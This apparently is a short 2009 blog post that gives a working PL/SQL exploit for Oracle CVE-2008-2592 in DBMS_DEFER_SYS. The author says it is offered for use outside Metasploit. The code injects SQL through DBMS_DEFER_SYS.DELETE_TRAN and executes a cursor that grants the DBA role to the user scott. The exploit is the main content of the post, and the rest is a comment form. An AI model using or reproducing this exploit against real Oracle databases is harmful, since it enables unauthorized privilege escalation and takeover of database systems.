DBMS_DEFER_SYS; CVE-2008-2592

October 1, 2009

The exploit for this vulnerability is in metasploit, but i could not find it on milw0rm or at any other exploit repository. This was patched in CPU July 2008

So, if you need to use it outside metasploit, here it is:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to scott”;commit;end;’,0);
DBMS_DEFER_SYS.DELETE_TRAN(‘aaaaaa’,’a” and dbms_sql.execute(‘||D||’)=1–‘);
end;

text file

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback